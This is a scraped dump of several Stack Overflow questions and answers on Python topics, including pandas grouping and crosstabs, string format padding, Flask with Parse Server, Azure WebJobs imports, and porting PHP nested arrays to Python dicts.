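<p>For example, with the frame from the question the per-group work can be pushed into a single function (shown here with plain pandas for brevity; on a dask frame the same <code>groupby('B').apply(...)</code> call additionally needs a <code>meta=</code> argument and a final <code>.compute()</code>):</p>

```python
import pandas as pd

pdf = pd.DataFrame({'A': [1, 2, 3, 4, 5], 'B': ['1', '1', 'a', 'a', 'a']})

# One function applied per group instead of iterating over the groups
sums = pdf.groupby('B')['A'].apply(lambda g: g.sum())
print(sums.to_dict())  # {'1': 3, 'a': 12}
```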
| 0 | 2016-10-03T12:41:55Z | [
"python",
"pandas",
"dask"
]
|
Matching entities with Google AppEngine MapReduce | 39,731,109 | <p>I have the following problem: I am using Google Datastore to store two kinds, <strong>Companies</strong> and <strong>Applicants</strong>, both of them come from different data sources so there is no way to link them directly (no common ID).</p>
<p>What I am trying to achieve is to compare the <strong>name</strong> of the entities of these two kinds (after doing some normalization) and save these as a new entity of type <strong>Match</strong>.</p>
<p>For that I created a MapReduce job on appengine that go through all the applicants (~ 1M entities) and for each entity queries for Companies with the same name (~ 10M entities in total), but the process is painfully slow, I am getting the following throughput:</p>
<p>mapper-calls: 691411 (9.27/sec avg.)<br/>
mapper-walltime-ms: 1724026200 (23108.41/sec avg.)</p>
<p>The wall time seems for me a bit too high but I am not sure of what it means, I am running 32 shards and the code is the following:</p>
<pre><code>def match_map(applicant):
if(applicant.applicant_name_normalised != ""):
# Check against the companies
cps = Company.query(Company.name_normalised == applicant.applicant_name_normalised).fetch(projection=[Company.dissolved])
if(len(cps) > 0):
is_potential = True
else:
return
m = Match(id=applicant.key.id())
idList = []
for c in cps:
idList.append(c.key)
if(c.dissolved != True):
is_potential = False
m.companies = idList
m.applicant = applicant.key
m.is_potential = is_potential
if(is_potential):
yield op.db.Put(m)
idList[:] = []
</code></pre>
<p>How could I implement this so it runs faster? I am almost to the point of leaving google datastore and doing this on another database or using scripts, I know queries can be expensive but 10 entities/s is just way lower than what I was expecting.</p>
<p>Thanks</p>
| 0 | 2016-09-27T17:41:23Z | 39,735,436 | <p>I can think of minor tips that could optimize what you do such as:</p>
<p>Instead of fetching all the results, iterate over them and bail out fast: start with is_potential = True and return (or set it to False and break) as soon as you see a company with c.dissolved != True.</p>
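<p>A minimal sketch of that early-return idea (the <code>Company</code> stand-in below is hypothetical, mirroring the question's <code>dissolved</code> flag):</p>

```python
from collections import namedtuple

Company = namedtuple('Company', 'dissolved')

def is_potential_match(companies):
    """True only if there is at least one company and all of them are dissolved."""
    found_any = False
    for c in companies:
        if not c.dissolved:
            return False        # bail out early: one live company disqualifies the match
        found_any = True
    return found_any

print(is_potential_match([Company(True), Company(True)]))   # True
print(is_potential_match([Company(True), Company(False)]))  # False
```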
<p>However, understanding the data model and what you are trying to achieve may help in coming up with a more optimal solution. In general, Cloud Datastore is not
designed for cross-Kind joins, and Google Cloud SQL may be a better fit for this problem.</p>
<p>Also, the expected data growth would help. As of now, loading the (10 + 1) million records (or projections, to save space) into memory and doing an in-memory join
would be simple and feasible, but that clearly does not scale.</p>
<p>Regarding scale, your current approach may also run into trouble if the number of company keys per match is too large to fit in one entity.</p>
| 0 | 2016-09-27T22:41:35Z | [
"python",
"google-app-engine",
"mapreduce",
"google-cloud-datastore"
]
|
What does {:4} mean in this matrix printing solution in python? | 39,731,205 | <p>In the solution to the question proposed here <a href="http://stackoverflow.com/questions/17870612/printing-a-two-dimensional-array-in-python">printing a two dimensional array in python</a> I'm not able to figure out what the {:4} part of the solution means exactly. I've tried this print statement and it seems to work very well, but for cases where I have very large matrices, I want to make sure I'm not adding or slicing valuable information.</p>
| 0 | 2016-09-27T17:48:00Z | 39,731,279 | <p>It has to do with padding and alignment in output. It is similar to padding in the <code>printf</code> function found in <code>c</code> or <code>awk</code>, etc. It gives each printed element a width of <code>n</code> where <code>n</code> is <code>{:n}</code>.</p>
<pre><code>''.join('{:3}'.format(x) for x in range(100))
</code></pre>
<p>Will output:</p>
<pre><code>' 0 1 2 3 4 5 ... 95 96 97 98 99'
</code></pre>
<p>Notice the single space to the left of <code>99</code> versus the two spaces to the left of <code>0</code>. In other words, each number has a width of 3 characters.</p>
<p>You can also accomplish a similar effect using a more traditional syntax.</p>
<pre><code>''.join('%3s' % x for x in range(100))
</code></pre>
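<p>One more point, since the question worries about losing information on large matrices: the number in <code>{:n}</code> is a <em>minimum</em> field width, so values wider than <code>n</code> are printed in full rather than truncated:</p>

```python
print('{:4}'.format(7))       # '   7'   -> padded out to 4 characters
print('{:4}'.format(123456))  # '123456' -> wider than 4, printed whole, nothing sliced
```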
| 2 | 2016-09-27T17:52:41Z | [
"python",
"arrays",
"matrix",
"printing",
"slice"
]
|
How to build python matrix (multidimensional array) based on number of rows and columns received from input | 39,731,262 | <p>Given a rectangular array (matrix) MxN with integer elements. M & N are the number of rows and columns of the rectangular matrix, received from input in one line separated by spaces. Next, N lines with M numbers each, separated by a space - the elements of the matrix, integers not exceeding 100 by absolute value.</p>
<p>For example:</p>
<p>Sample Input:</p>
<pre><code>2 3
1 -2 3
4 5 6
</code></pre>
<p>Sample Output:</p>
<pre><code>[[1, -2, 3], [4, 5, 6]]
</code></pre>
<p>Code:</p>
<pre><code>cols, rows = [int(i) for i in input().split(" ")]
l = [[list(map(int, input()))] for j in range(rows)]
</code></pre>
<p>With rows it's clear; however, I don't know how to control the line length so that it equals the number received from input as cols.</p>
<p>Any hints will be appreciated...</p>
| 0 | 2016-09-27T17:51:33Z | 39,731,523 | <p>First of all, based on the sample output, rows and cols should be interchanged; second, slice each line's tokens to cols with [:cols], as shown below. Note that in Python 3 <code>map()</code> returns an iterator, so wrap it in <code>list()</code> to get the nested-list output:</p>
<pre><code>rows, cols = [int(i) for i in input().split(" ")]
l = [list(map(int, input().split(" ")[:cols])) for i in range(rows)]
</code></pre>
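<p>A self-contained version of the same parsing (hard-coded text stands in for <code>input()</code> so it can be run as-is):</p>

```python
raw = """2 3
1 -2 3
4 5 6"""

lines = raw.splitlines()
rows, cols = (int(i) for i in lines[0].split())
matrix = [[int(x) for x in lines[r + 1].split()[:cols]] for r in range(rows)]
print(matrix)  # [[1, -2, 3], [4, 5, 6]]
```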
| 0 | 2016-09-27T18:06:54Z | [
"python",
"arrays",
"python-3.x",
"matrix",
"input"
]
|
Manipulating pandas series - empty rows in a column | 39,731,313 | <p>I apologize in advance for what I guess is a basic dataframe / series selection issue, but I am a newbie and a bit stuck.</p>
<p>I have the following data:</p>
<pre><code>seas off
2000 ARI 0.569369
ATL 0.553398
BAL 0.554404
BUF 0.571429
CAR 0.600000
CHI 0.560886
CIN 0.454945
CLE 0.573196
DAL 0.572707
DEN 0.612850
DET 0.550696
</code></pre>
<p>The 'seas' then repeats for 2001 and so on for 2015. FWIW, when I try <code>df['off']</code> it doesn't return the "off" column.</p>
<p>Anyway, what I want to do is basically create a key for each number. To do this I want to copy the year down for each row so it and then to add it to "off" to get a key. So as follows:</p>
<pre><code>seas off value key
2000 ARI 0.569369 2000ARI
2000 ATL 0.553398 2000ATL
2000 BAL 0.554404 2000BAL
2000 BUF 0.571429 2000BUF
2000 CAR 0.600000 2000CAR
...
...
2001 CHI 0.560886 2001CHI
2001 CIN 0.454945 2001CIN
2001 CLE 0.573196 2001CLE
2001 DAL 0.572707 2001DAL
2001 DEN 0.612850 2001DEN
2001 DET 0.550696 2001DET
</code></pre>
<p>Help much appreciated ...</p>
<p>John</p>
| -1 | 2016-09-27T17:55:00Z | 39,731,502 | <p>My guess is that you don't have a DataFrame, but a Series with a MultiIndex.</p>
<pre><code>import io
import pandas as pd
data = io.StringIO('''\
seas off value
2000 ARI 0.569369
2000 ATL 0.553398
2000 BAL 0.554404
2000 BUF 0.571429
2000 CAR 0.600000
2000 CHI 0.560886
2000 CIN 0.454945
2000 CLE 0.573196
2000 DAL 0.572707
2000 DEN 0.612850
2000 DET 0.550696
''')
df = pd.read_csv(data, delim_whitespace=True).set_index(['seas', 'off']).squeeze()
</code></pre>
<p>In that case, here's what you can do. First, make <code>seas</code> and <code>off</code> into columns of a DataFrame:</p>
<pre><code>df = df.reset_index()
</code></pre>
<p>Then create a column <code>key</code> by concatenating the <code>seas</code> and <code>off</code> columns:</p>
<pre><code>df['key'] = df['seas'].astype(str) + df['off']
</code></pre>
<p>Finally, send <code>seas</code> and <code>off</code> back to the index:</p>
<pre><code>df = df.set_index(['seas', 'off'])
</code></pre>
<p>Output:</p>
<pre><code> value key
seas off
2000 ARI 0.569369 2000ARI
ATL 0.553398 2000ATL
BAL 0.554404 2000BAL
BUF 0.571429 2000BUF
CAR 0.600000 2000CAR
CHI 0.560886 2000CHI
CIN 0.454945 2000CIN
CLE 0.573196 2000CLE
DAL 0.572707 2000DAL
DEN 0.612850 2000DEN
DET 0.550696 2000DET
</code></pre>
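<p>The same key can also be built straight from the MultiIndex, without the reset/set round-trip (a sketch on a small series of the same shape):</p>

```python
import pandas as pd

s = pd.Series(
    [0.569369, 0.553398],
    index=pd.MultiIndex.from_tuples([(2000, 'ARI'), (2000, 'ATL')],
                                    names=['seas', 'off']),
    name='value',
)
df = s.to_frame()
df['key'] = [str(seas) + off for seas, off in df.index]
print(df['key'].tolist())  # ['2000ARI', '2000ATL']
```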
| 1 | 2016-09-27T18:05:49Z | [
"python",
"pandas",
"dataframe",
"series"
]
|
Authentication Error when using Flask to connect to ParseServer | 39,731,315 | <p>What I am trying to achieve is pretty simple.</p>
<p>I want to use Flask to create a web app that connects to a remote Server via API calls (specifically ParseServer).
I am using a third-party library to achieve this and everything works perfectly when I am running my code in a stand-alone script. But when I add my code into the Flask I suddenly can't authenticate with the Server</p>
<blockquote>
<p>Or to be more precise I get an 'unauthorized' error when executing an API call. </p>
</blockquote>
<p>It seems to me that in Flask, the registration method used by the APi library is not remembered.</p>
<p>I tried many things of putting the registration and initialization code in different places in Flask, nothing worked. </p>
<p>I asked a similar question in the Github of the <a href="https://github.com/milesrichardson/ParsePy/issues/147" rel="nofollow">Library</a> with no help. </p>
<p>So I guess I have <strong>two questions</strong> that could help me solve this</p>
<p>1) Where should I put a registration method and import of the files from this library?
&</p>
<p>2) What can I do to identify the issue specifically, eg. to know precisely what's wrong?</p>
<p>Here's some code</p>
<p>The Flask code is here</p>
<pre><code>@app.route('/parseinsert')
def run_parse_db_insert():
"""The method for testing implementation and design of the Parse Db
"""
pc = ParseCommunication()
print(pc.get_all_names_rating_table())
return 'done'
</code></pre>
<p>The ParseCommunication is my Class that deals with Parse. If I run ParseCommunication from that script, with the same code as above in the <strong>main</strong> part, everything works perfectly.</p>
<p>I run the Flask app with dev_appserver.py from Google App Engine.</p>
<p>My folder structure </p>
<pre><code>/parseTest
/aplication
views.py
app.yaml
run.py
</code></pre>
<p>My run.py code</p>
<pre><code>import os
import sys
sys.path.insert(1, os.path.join(os.path.abspath('.'), 'lib'))
sys.path.insert(1, os.path.join(os.path.abspath('.'), 'application'))
import aplication
</code></pre>
<p>Let me know what else I could provide to help out.</p>
<p>Thank you in Advance</p>
<p>EDIT:</p>
<p>A stack trace as requested.
It's mostly related to the library (from what I can tell):</p>
<pre><code>ERROR 2016-09-28 06:45:50,271 app.py:1587] Exception on /parseinsert [GET]
Traceback (most recent call last):
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1988, in wsgi_app
response = self.full_dispatch_request()
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1641, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1544, in handle_user_exception
reraise(exc_type, exc_value, tb)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1639, in full_dispatch_request
rv = self.dispatch_request()
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1625, in dispatch_request
return self.view_functions[rule.endpoint](**req.view_args)
File "/home/theshade/Devel/ParseBabynames/parseTest/aplication/views.py", line 34, in run_parse_db_insert
name = pc.get_user('testuser1')
File "/home/theshade/Devel/ParseBabynames/parseTest/aplication/parseCommunication.py", line 260, in get_user
return User.Query.get(username=uname)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/query.py", line 58, in get
return self.filter(**kw).get()
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/query.py", line 150, in get
results = self._fetch()
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/query.py", line 117, in _fetch
return self._manager._fetch(**options)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/query.py", line 41, in _fetch
return [klass(**it) for it in klass.GET(uri, **kw).get('results')]
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/connection.py", line 108, in GET
return cls.execute(uri, 'GET', **kw)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/connection.py", line 102, in execute
raise exc(e.read())
ResourceRequestLoginRequired: {"error":"unauthorized"}
</code></pre>
| 0 | 2016-09-27T17:55:03Z | 39,751,964 | <p>Parse requires keys and env variables. Check this line:</p>
<p><code>API_ROOT = os.environ.get('PARSE_API_ROOT') or 'https://api.parse.com/1'</code></p>
<p>Your error is in line 102 at:</p>
<p><code>https://github.com/milesrichardson/ParsePy/blob/master/parse_rest/connection.py</code></p>
<p>Before you can parse, you need to register:</p>
<pre><code>from parse_rest.connection import register
APPLICATION_ID = '...'
REST_API_KEY = '...'
MASTER_KEY = '...'
register(APPLICATION_ID, REST_API_KEY, master_key=MASTER_KEY)
</code></pre>
| 1 | 2016-09-28T15:36:15Z | [
"python",
"google-app-engine",
"parse.com",
"flask",
"parse-server"
]
|
Selenium python- how can I fill all input fields at once | 39,731,338 | <p>Is it possible to fill all the fields on the page at once instead of one by one?</p>
<p>Right now I have</p>
<pre><code>driver.find_element_by_id('1').send_keys(input1)
driver.find_element_by_id('2').send_keys(input2)
driver.find_element_by_id('3').send_keys(input3)
</code></pre>
<p>and it goes one by one taking a while to fill a form.</p>
| 0 | 2016-09-27T17:56:56Z | 39,731,393 | <p>You may construct a <code>dict</code> in python to store the values corresponding to id and Iterate over it to fill up the corresponding data.</p>
<pre><code>input_mapping = {"1": "input1", "2": "input2", "3": "input3"}
for key, value in input_mapping.items():
driver.find_element_by_id(key).send_keys(value)
</code></pre>
<p>But the above approach won't be sequential, as a plain dictionary maintains no order of its own. So it would be a better choice to use <code>collections.OrderedDict()</code> if the order really matters.</p>
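<p>For example (the element ids are hypothetical, and the <code>send_keys</code> call is stood in for by a list append so the fill order is visible without a browser). Note that on Python 3.7+ a plain <code>dict</code> preserves insertion order too, so <code>OrderedDict</code> is only needed on older versions:</p>

```python
from collections import OrderedDict

input_mapping = OrderedDict([("1", "input1"), ("2", "input2"), ("3", "input3")])

filled = []
for key, value in input_mapping.items():
    # would be: driver.find_element_by_id(key).send_keys(value)
    filled.append((key, value))

print(filled)  # [('1', 'input1'), ('2', 'input2'), ('3', 'input3')]
```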
| 0 | 2016-09-27T17:59:36Z | [
"python",
"selenium",
"webdriver"
]
|
Can't access blob storage via azure-storage package in Python WebJob | 39,731,370 | <p>I am trying to read/write from blob storage using a Python WebJob on an Azure App Service. My App Service's requirements.txt file includes the azure-storage package name: the package is successfully installed via pip during App Service deployment. However, when I include the following in my WebJob's run.py file:</p>
<pre><code>import sys
sys.path.append('D:\\home\\site\\wwwroot\\env\\Lib\\site-packages')
from azure.storage.blob import BlockBlobService
</code></pre>
<p>...I get the following error message at runtime:</p>
<pre><code>[09/27/2016 17:51:09 > 775106: SYS INFO] Status changed to Initializing
[09/27/2016 17:51:09 > 775106: SYS INFO] Run script 'run.py' with script host - 'PythonScriptHost'
[09/27/2016 17:51:09 > 775106: SYS INFO] Status changed to Running
[09/27/2016 17:51:10 > 775106: ERR ] Traceback (most recent call last):
[09/27/2016 17:51:10 > 775106: ERR ] File "run.py", line 11, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from azure.storage.blob import BlockBlobService
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\blob\__init__.py", line 15, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from .models import (
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\blob\models.py", line 15, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from .._common_conversion import _to_str
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\_common_conversion.py", line 22, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from .models import (
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\models.py", line 23, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from ._error import (
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\_error.py", line 15, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from ._common_conversion import _to_str
[09/27/2016 17:51:10 > 775106: ERR ] ImportError: cannot import name '_to_str'
[09/27/2016 17:51:10 > 775106: SYS INFO] Status changed to Failed
[09/27/2016 17:51:10 > 775106: SYS ERR ] Job failed due to exit code 1
</code></pre>
<p>FWIW, several other packages were loaded properly using the same approach. Can anyone suggest a method to get the azure-storage package working in Python Azure WebJobs?</p>
| 0 | 2016-09-27T17:58:36Z | 39,779,590 | <p>Looks like the six module is missing. This issue is also tracked via this thread: <a href="https://github.com/Azure/azure-storage-python/issues/22" rel="nofollow">https://github.com/Azure/azure-storage-python/issues/22</a>. You can fix the issue by adding six to requirements.txt or by installing it manually with pip install six.</p>
| 1 | 2016-09-29T20:39:49Z | [
"python",
"azure",
"windows-azure-storage",
"azure-storage-blobs",
"azure-webjobs"
]
|
dataframe column slices excluding specific columns | 39,731,395 | <p>How will I slice a pandas dataframe with a large number of columns, where I do not wish to select specific, non-sequentially positioned columns? One option is to drop those columns, but can I do something like:</p>
<pre><code>df = pd.DataFrame(np.random.randint(0,100,(2,10)),columns=list('abcdefghij'))
df.iloc[:,~[1,4,9]]
</code></pre>
| 1 | 2016-09-27T17:59:46Z | 39,731,653 | <p>you can do it this way:</p>
<pre><code>In [66]: cols2exclude = [1,4,9]
In [67]: df.ix[:, df.columns.difference(df.columns[cols2exclude])]
Out[67]:
a c d f g h i
0 12 37 39 46 22 71 37
1 72 3 17 30 11 26 73
</code></pre>
<p>or:</p>
<pre><code>In [68]: df.ix[:, ~df.columns.isin(df.columns[cols2exclude])]
Out[68]:
a c d f g h i
0 68 49 90 9 48 36 26
1 6 72 98 49 44 10 36
</code></pre>
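<p>Side note: <code>.ix</code> was later deprecated; the same selection works with <code>.loc</code> or <code>drop</code> (a sketch with the same column labels):</p>

```python
import numpy as np
import pandas as pd

df = pd.DataFrame(np.arange(20).reshape(2, 10), columns=list('abcdefghij'))
cols2exclude = [1, 4, 9]

kept = df.loc[:, ~df.columns.isin(df.columns[cols2exclude])]
print(list(kept.columns))  # ['a', 'c', 'd', 'f', 'g', 'h', 'i']

# or, by dropping the unwanted labels:
kept2 = df.drop(columns=df.columns[cols2exclude])
```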
| 1 | 2016-09-27T18:15:46Z | [
"python",
"pandas",
"dataframe",
"slice"
]
|
python pandas summarizing nominal variables (counting) | 39,731,396 | <p>I have following data frame:</p>
<pre class="lang-none prettyprint-override"><code>KEY PROD PARAMETER Y/N
1 AAA PARAM1 Y
1 AAA PARAM2 N
1 AAA PARAM3 N
2 AAA PARAM1 N
2 AAA PARAM2 Y
2 AAA PARAM3 Y
3 CCC PARAM1 Y
3 CCC PARAM2 Y
3 CCC PARAM3 Y
</code></pre>
<p>I am interested in summarizing Y/N column values by PROD and PARAMETER columns and get the following output:</p>
<pre class="lang-none prettyprint-override"><code>PROD PARAM Y N
AAA PARAM1 1 1
AAA PARAM2 1 1
AAA PARAM3 1 1
CCC PARAM1 1 0
CCC PARAM2 1 0
CCC PARAM3 1 0
</code></pre>
<p>While Y and N values are counts of Y/N column values from the original data frame.</p>
| 2 | 2016-09-27T17:59:57Z | 39,731,740 | <p>You could use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.pivot_table.html" rel="nofollow"><code>pivot_table</code></a> by creating an additional column with the value 1; the actual value doesn't matter either way, since you are only counting rows:</p>
<pre><code>df['Y/Ncount'] = 1
df = df.pivot_table(index=['PROD', 'PARAMETER'], columns=['Y/N'], values=['Y/Ncount'],
aggfunc=sum, fill_value=0)
df.columns = [col for col in df.columns.get_level_values(1)]
df.reset_index()
</code></pre>
<p><a href="http://i.stack.imgur.com/OvPpj.png" rel="nofollow"><img src="http://i.stack.imgur.com/OvPpj.png" alt="Image"></a></p>
<hr>
<p>The simplest operation to use under this scenario would be <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.crosstab.html" rel="nofollow"><code>crosstab</code></a> which would produce the frequency counts of values present inside the Y/N column:</p>
<pre><code>pd.crosstab([df['PROD'], df['PARAMETER']], df['Y/N'])
</code></pre>
<p><a href="http://i.stack.imgur.com/1p6eA.png" rel="nofollow"><img src="http://i.stack.imgur.com/1p6eA.png" alt="Image"></a></p>
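<p>For readers who can't see the screenshots, the crosstab call reproduces the desired table directly (counts of Y/N per PROD/PARAMETER pair, with missing combinations filled as 0):</p>

```python
import pandas as pd

df = pd.DataFrame({
    'KEY': [1, 1, 1, 2, 2, 2, 3, 3, 3],
    'PROD': ['AAA'] * 6 + ['CCC'] * 3,
    'PARAMETER': ['PARAM1', 'PARAM2', 'PARAM3'] * 3,
    'Y/N': ['Y', 'N', 'N', 'N', 'Y', 'Y', 'Y', 'Y', 'Y'],
})
ct = pd.crosstab([df['PROD'], df['PARAMETER']], df['Y/N'])
print(ct)
```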
| 3 | 2016-09-27T18:20:50Z | [
"python",
"pandas",
"dataframe",
"summarize"
]
|
python pandas summarizing nominal variables (counting) | 39,731,396 | <p>I have following data frame:</p>
<pre class="lang-none prettyprint-override"><code>KEY PROD PARAMETER Y/N
1 AAA PARAM1 Y
1 AAA PARAM2 N
1 AAA PARAM3 N
2 AAA PARAM1 N
2 AAA PARAM2 Y
2 AAA PARAM3 Y
3 CCC PARAM1 Y
3 CCC PARAM2 Y
3 CCC PARAM3 Y
</code></pre>
<p>I am interested in summarizing Y/N column values by PROD and PARAMETER columns and get the following output:</p>
<pre class="lang-none prettyprint-override"><code>PROD PARAM Y N
AAA PARAM1 1 1
AAA PARAM2 1 1
AAA PARAM3 1 1
CCC PARAM1 1 0
CCC PARAM2 1 0
CCC PARAM3 1 0
</code></pre>
<p>While Y and N values are counts of Y/N column values from the original data frame.</p>
| 2 | 2016-09-27T17:59:57Z | 39,731,750 | <p>You want to get the counts of the values in the <code>Y/N</code> column, grouped by <code>PROD</code> and <code>PARAMETER</code>.</p>
<pre><code>import io
import pandas as pd
data = io.StringIO('''\
KEY PROD PARAMETER Y/N
1 AAA PARAM1 Y
1 AAA PARAM2 N
1 AAA PARAM3 N
2 AAA PARAM1 N
2 AAA PARAM2 Y
2 AAA PARAM3 Y
3 CCC PARAM1 Y
3 CCC PARAM2 Y
3 CCC PARAM3 Y
''')
df = pd.read_csv(data, delim_whitespace=True)
res = (df.groupby(['PROD', 'PARAMETER'])['Y/N'] # Group by `PROD` and `PARAMETER`
# and select the `Y/N` column
.value_counts() # Get the count of values
.unstack('Y/N') # Long-to-wide format change
.fillna(0) # Fill `NaN`s with zero
.astype(int)) # Cast to integer
print(res)
</code></pre>
<p>Output:</p>
<pre class="lang-none prettyprint-override"><code>Y/N N Y
PROD PARAMETER
AAA PARAM1 1 1
PARAM2 1 1
PARAM3 1 1
CCC PARAM1 0 1
PARAM2 0 1
PARAM3 0 1
</code></pre>
| 2 | 2016-09-27T18:21:30Z | [
"python",
"pandas",
"dataframe",
"summarize"
]
|
Python reading data from input file | 39,731,431 | <p>I want to read specific data from an input file. How can I read it?</p>
<p>For example my file has data like:</p>
<pre class="lang-none prettyprint-override"><code>this is my first line
this is my second line.
</code></pre>
<p>So I just want to read <code>first</code> from the first line and <code>secon</code> from the second line.</p>
| -6 | 2016-09-27T18:01:48Z | 39,732,061 | <p>Try the following code for your needs but please read the comments above.</p>
<pre><code># ----------------------------------------
# open text file and write reduced lines
# ----------------------------------------
#this is my first line
#this is my second line.
pathnameIn = "D:/_working"
filenameIn = "foobar.txt"
pathIn = pathnameIn + "/" + filenameIn
pathnameOut = "D:/_working"
filenameOut = "foobar_reduced.txt"
pathOut = pathnameOut + "/" + filenameOut
fileIn = open(pathIn,'r')
fileOut = open(pathOut,'w')
print(fileIn)
print(fileOut)
i = 0
# Save all reduced lines to a file.
for lineIn in fileIn.readlines():
i += 1 # number of lines read
lineOut = lineIn[11:16]
    fileOut.write(lineOut + "\n")
print("*********************************")
print("lines read: " + str(i))
print("*********************************")
fileIn.close()
fileOut.close()
</code></pre>
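<p>A more compact sketch of the same idea, reading from a hard-coded string so it runs standalone (the slice bounds <code>[11:16]</code> are the ones that pick out <code>first</code>/<code>secon</code> from the sample lines):</p>

```python
text = """this is my first line
this is my second line."""

words = [line[11:16] for line in text.splitlines()]
print(words)  # ['first', 'secon']
```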
| 0 | 2016-09-27T18:39:35Z | [
"python",
"python-3.x"
]
|
Math operations on multi-dimensional Python dicts | 39,731,477 | <p>I am porting over some code from PHP that iterates through some database results and builds a two-dimensional array of wins and losses for teams in a baseball league. Here's the code in question in PHP</p>
<pre><code> foreach ($results as $result) {
$home_team = $result['Game']['home_team_id'];
$away_team = $result['Game']['away_team_id'];
if (!isset($wins[$home_team][$away_team])) $wins[$home_team][$away_team] = 0;
if (!isset($wins[$away_team][$home_team])) $wins[$away_team][$home_team] = 0;
if (!isset($losses[$home_team][$away_team])) $losses[$home_team][$away_team] = 0;
if (!isset($losses[$away_team][$home_team])) $losses[$away_team][$home_team] = 0;
if ($result['Game']['home_score'] > $result['Game']['away_score']) {
$wins[$home_team][$away_team]++;
$losses[$away_team][$home_team]++;
} else {
$wins[$away_team][$home_team]++;
$losses[$home_team][$away_team]++;
}
}
</code></pre>
<p><code>$results</code> is an array that contains the results of a database query</p>
<p>(Edited to add the Python code I have in progress)</p>
<p>Now I have this but in Python. <code>results</code> contains a collection of Sqlalchemy result objects</p>
<pre><code>from sqlalchemy import Column, create_engine, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
engine = create_engine('postgresql://stats:st@ts=Fun@localhost/ibl_stats')
Session = sessionmaker()
Session.configure(bind=engine)
session = Session()
class Game(Base):
__tablename__ = 'games'
id = Column(Integer, primary_key=True)
week = Column(Integer)
home_score = Column(Integer)
away_score = Column(Integer)
home_team_id = Column(Integer, ForeignKey('franchises.id'))
away_team_id = Column(Integer, ForeignKey('franchises.id'))
class Franchise(Base):
__tablename__ = 'franchises'
id = Column(Integer, primary_key=True)
nickname = Column(String(3))
name = Column(String(50))
conference = Column(String(10))
division = Column(String(10))
ip = Column(Integer)
# Loop through our standings building up the breakdown results
results = session.query(Game).all()
wins = dict()
losses = dict()
for result in results:
home_team = result.home_team_id
away_team = result.away_team_id
if result.home_score > result.away_score:
wins[home_team][away_team] += 1
losses[away_team][home_team] += 1
else:
wins[away_team][home_team] += 1
losses[home_team][away_team] += 1
</code></pre>
<p>So when I run this code I get the following error:</p>
<pre><code>(venv)vagrant@ibl:/vagrant/scripts$ python playoff_odds.py
Traceback (most recent call last):
File "playoff_odds.py", line 45, in <module>
wins[home_team][away_team] += 1
KeyError: 1
</code></pre>
<p>I did some searching before and it starts getting into the concept of "autovivification", which is something PHP does by default but Python does not.</p>
<p>So how do I duplicate the same behaviour in the Python code?</p>
| 2 | 2016-09-27T18:04:27Z | 39,731,664 | <p>I think I would probably use namedtuples here, but it's hard to tell from just this snippet.</p>
<p>If you'd like material on how to write more Pythonic code, I recommend checking out Raymond Hettinger's videos, particularly</p>
<p>"Best practices for beautiful intelligible code" and
"Transforming Code into Beautiful, Idiomatic Python": </p>
<p><a href="http://pyvideo.org/speaker/raymond-hettinger.html" rel="nofollow">http://pyvideo.org/speaker/raymond-hettinger.html</a></p>
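<p>For the autovivification part specifically, <code>collections.defaultdict</code> gives the PHP-like behaviour directly: missing keys spring into existence with a zero count, so the <code>KeyError</code> from the traceback goes away (a sketch with made-up game tuples standing in for the SQLAlchemy results):</p>

```python
from collections import defaultdict

wins = defaultdict(lambda: defaultdict(int))
losses = defaultdict(lambda: defaultdict(int))

# (home_team_id, away_team_id, home_score, away_score) -- made-up results
games = [(1, 2, 5, 3), (2, 1, 4, 6)]

for home, away, home_score, away_score in games:
    if home_score > away_score:
        wins[home][away] += 1
        losses[away][home] += 1
    else:
        wins[away][home] += 1
        losses[home][away] += 1

print(wins[1][2], losses[2][1])  # 2 2  (team 1 beat team 2 both home and away)
```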
| 1 | 2016-09-27T18:16:05Z | [
"python",
"dictionary"
]
|
Math operations on multi-dimensional Python dicts | 39,731,477 | <p>I am porting over some code from PHP that iterates through some database results and builds a two-dimensional array of wins and losses for teams in a baseball league. Here's the code in question in PHP</p>
<pre><code> foreach ($results as $result) {
$home_team = $result['Game']['home_team_id'];
$away_team = $result['Game']['away_team_id'];
if (!isset($wins[$home_team][$away_team])) $wins[$home_team][$away_team] = 0;
if (!isset($wins[$away_team][$home_team])) $wins[$away_team][$home_team] = 0;
if (!isset($losses[$home_team][$away_team])) $losses[$home_team][$away_team] = 0;
if (!isset($losses[$away_team][$home_team])) $losses[$away_team][$home_team] = 0;
if ($result['Game']['home_score'] > $result['Game']['away_score']) {
$wins[$home_team][$away_team]++;
$losses[$away_team][$home_team]++;
} else {
$wins[$away_team][$home_team]++;
$losses[$home_team][$away_team]++;
}
}
</code></pre>
<p><code>$results</code> is an array that contains the results of a database query</p>
<p>(Edited to add the Python code I have in progress)</p>
